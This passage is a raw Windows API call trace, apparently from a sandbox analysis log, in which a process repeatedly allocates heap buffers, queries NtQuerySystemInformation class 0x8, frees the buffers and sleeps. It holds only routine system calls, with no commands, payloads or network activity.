dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0273.827] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c838 [0273.827] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c838, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c838, ResultLength=0x19ee88*=0xc0) returned 0x0 [0273.827] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c838 | out: hHeap=0x2560000) returned 1 [0273.827] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0273.828] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0273.828] Sleep (dwMilliseconds=0x110) [0273.842] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0273.842] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.843] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0273.844] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0273.844] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.844] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0273.844] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b808 [0273.845] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b808, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b808, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.846] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b808 | out: hHeap=0x2560000) returned 1 [0273.846] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0273.846] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0273.847] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0273.847] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0273.848] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0273.848] Sleep (dwMilliseconds=0x110) [0273.856] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0273.856] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.857] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0273.857] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0273.857] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.858] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0273.858] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0273.858] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.859] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0273.859] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0273.859] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0273.860] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0273.862] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0273.862] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0273.862] Sleep (dwMilliseconds=0x110) [0273.872] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0273.872] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.873] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0273.873] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0273.873] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.874] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0273.874] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b808 [0273.874] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b808, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b808, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.874] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b808 | out: hHeap=0x2560000) returned 1 [0273.874] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0273.874] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0273.875] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0273.875] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0273.876] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0273.876] Sleep (dwMilliseconds=0x110) [0273.888] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0273.888] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.888] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0273.888] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0273.888] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.889] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0273.889] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b9d0 [0273.889] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b9d0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b9d0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.890] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b9d0 | out: hHeap=0x2560000) returned 1 [0273.891] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d260 [0273.891] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d260, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d260, ResultLength=0x19ee88*=0xc0) returned 0x0 [0273.891] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d260 | out: hHeap=0x2560000) returned 1 [0273.891] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0273.892] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0273.892] Sleep (dwMilliseconds=0x110) [0273.996] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0273.996] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.997] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0273.998] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0273.998] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.998] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0273.998] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b8a0 [0273.998] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b8a0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.999] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b8a0 | out: hHeap=0x2560000) returned 1 [0273.999] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0273.999] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0273.999] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0273.999] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0274.000] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0274.000] Sleep (dwMilliseconds=0x110) [0274.061] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0274.061] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.062] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0274.062] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0274.062] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.062] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0274.063] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0274.063] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.063] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0274.063] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0274.063] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0274.064] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0274.064] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0274.065] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0274.065] Sleep (dwMilliseconds=0x110) [0274.078] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0274.078] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.078] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0274.079] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0274.079] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.079] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0274.079] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c350 [0274.079] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c350, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c350, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.079] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c350 | out: hHeap=0x2560000) returned 1 [0274.080] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0274.080] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0274.080] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0274.080] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0274.080] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0274.080] Sleep (dwMilliseconds=0x110) [0274.092] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0274.092] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.093] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0274.093] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0274.093] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.094] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0274.094] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0274.094] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.094] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0274.094] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0274.094] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0274.096] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0274.096] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0274.097] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0274.097] Sleep (dwMilliseconds=0x110) [0274.106] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0274.106] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.107] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0274.107] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0274.107] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.108] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0274.108] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bc30 [0274.108] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bc30, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bc30, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.109] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bc30 | out: hHeap=0x2560000) returned 1 [0274.109] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0274.109] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0274.109] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0274.109] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0274.110] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0274.110] Sleep (dwMilliseconds=0x110) [0274.122] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0274.122] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.124] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0274.124] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0274.124] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.125] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0274.125] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0274.125] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.126] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0274.126] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0274.126] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0274.127] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0274.127] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0274.128] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0274.128] Sleep (dwMilliseconds=0x110) [0274.139] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0274.139] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.140] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0274.140] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0274.140] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.140] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0274.140] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bc30 [0274.141] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bc30, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bc30, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.141] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bc30 | out: hHeap=0x2560000) returned 1 [0274.141] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0274.141] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0274.142] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0274.142] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0274.143] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0274.143] Sleep (dwMilliseconds=0x110) [0274.156] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0274.156] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.157] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0274.157] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0274.157] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.158] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0274.158] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0274.158] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.159] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0274.159] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0274.159] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0274.160] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0274.160] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0274.160] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0274.161] Sleep (dwMilliseconds=0x110) [0274.177] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0274.177] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.178] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0274.178] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0274.178] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.179] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0274.179] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0274.179] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.180] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0274.187] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0274.187] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0274.187] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0274.187] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0274.187] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0274.188] Sleep (dwMilliseconds=0x110) [0274.346] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0274.346] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.346] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0274.353] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0274.353] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0274.353] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0274.354] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0274.354] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | 